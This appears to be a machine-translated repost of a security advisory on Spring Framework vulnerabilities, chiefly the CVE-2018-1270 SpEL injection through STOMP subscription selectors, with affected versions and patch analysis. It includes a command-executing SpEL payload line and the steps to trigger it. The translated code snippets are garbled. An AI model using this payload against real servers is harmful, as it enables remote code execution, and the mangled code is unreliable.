Shulou(Shulou.com)06/01 Report--

This article introduces how to carry out spring-messaging remote code execution vulnerability analysis, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Overview of 0x00 vulnerabilities

On April 5, 2018, Pivotal Spring officially issued a security announcement that there are three vulnerabilities in the Spring framework, including a vulnerability numbered CVE-2018-1270 that could lead to remote code execution.

Through the relevant analysis of this vulnerability, 360-CERT believes that the impact of the vulnerability is serious; at present, the relevant PoC has been released, and relevant users are advised to evaluate and upgrade as soon as possible.

0x01 vulnerability impact surface impact version

Spring Framework 5.0 to 5.0.4.

Spring Framework 4.3 to 4.3.14

Older versions that are no longer supported are still affected

Repair version

5.0.x users upgrade to version 5.0.5

4.3.x users upgrade to version 4.3.15

0x02 vulnerability details CVE-2018-1270

STOMP (Simple Text-Orientated Messaging Protocol) is implemented through spring-messaging module in Spring framework. STOMP is a simple message protocol that encapsulates WebSocket. An attacker can cause remote code execution by establishing a WebSocket connection and sending a message. If the authority authentication in the Spring Security project is used, it can increase the difficulty of vulnerability exploitation to a certain extent.

CVE-2018-1271

When static resources of Spring MVC are stored on Windows systems, attacks can cause directory traversal vulnerabilities by constructing special URL.

This vulnerability has a high trigger condition:

Server runs on Windows system

File services provided from the file system (such as using the file protocol, but not file open)

No patch using CVE-2018-1199 vulnerability

Do not use Tomcat or WildFly for Server

CVE-2018-1272

In the case of Spring MVC or WebFlux applications redirecting client requests to another server, an attacker may escalate another server by constructing and contaminating Multipart type requests.

0x03 CVE-2018-1270 vulnerability Analysis SpEL

The full name of Spring expression language is Spring Expression Language, which supports querying and manipulating runtime object navigation graphs. The syntax is similar to traditional EL and provides additional functions for function calls and template functions for simple strings.

SpEL usage

String expression = "T (java.lang.Runtime) .getRuntime () .exec (/" calc/ ")"

String result = parser.parse_Expression (expression). GetValue (). ToString ()

Vulnerability trigger process

Set up spring-message project demo (https://github.com/spring-guides/gs-messaging-stomp-websocket)

The static resource app.js runs on the client side to do websocket interaction with the server, and uses the connect () function to establish a Stomp link.

Function connect () {

Var socket = new SockJS ('/ gs-guide-websocket')

StompClient = Stomp.over (socket)

StompClient.connect ({}, function (frame) {

SetConnected (true)

Console.log ('Connected:' + frame)

StompClient.subscribe ('/ topic/greetings', function (greeting) {

ShowGreeting (JSON.parse (greeting.body) .content)

});

});

}

Step1

Add a header header and add a selector entry. Value filters the subscription information by specifying selector in the payload,Stomp protocol specification.

The Web application processes the message in handleMessageInternal, registers the subscriber registerSubscription, and finally calls the DefaultSubscriptionRegistry function to process the header parameter, parses the selector value, and saves it to this session.

Step2

Click send to send any message to the server. When Spring distributes messages to subscribers, filterSubscription is called to filter the messages, and expression.getValue (context, Boolean.class) is executed to cause arbitrary command execution.

Patch analysis

Patch address (https://github.com/spring-projects/spring-framework/commit/e0de9126ed8cf25cf141d3e66420da94e350708a#diff-ca84ec52e20ebb2a3732c6c15f37d37a)

-import org.springframework.expression.spel.support.StandardEvaluationContext

+ import org.springframework.expression.spel.support.SimpleEvaluationContext

The StandardEvaluationContext reference is deleted and SimpleEvaluationContext is used. StandardEvaluationContext can execute arbitrary SpEL expressions. Spring officially switched to SimpleEvaluationContext after 5.0.5 for simple data binding, maintaining flexibility and reducing security risks.

SimpleEvaluationContext address (https://github.com/spring-projects/spring-framework/blob/v5.0.5.RELEASE/spring-expression/src/main/java/org/springframework/expression/spel/support/SimpleEvaluationContext.java)

StandardEvaluationContext address (https://github.com/spring-projects/spring-framework/blob/v5.0.5.RELEASE/spring-expression/src/main/java/org/springframework/expression/spel/support/StandardEvaluationContext.java)

On how to carry out spring-messaging remote code execution vulnerability analysis is shared here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.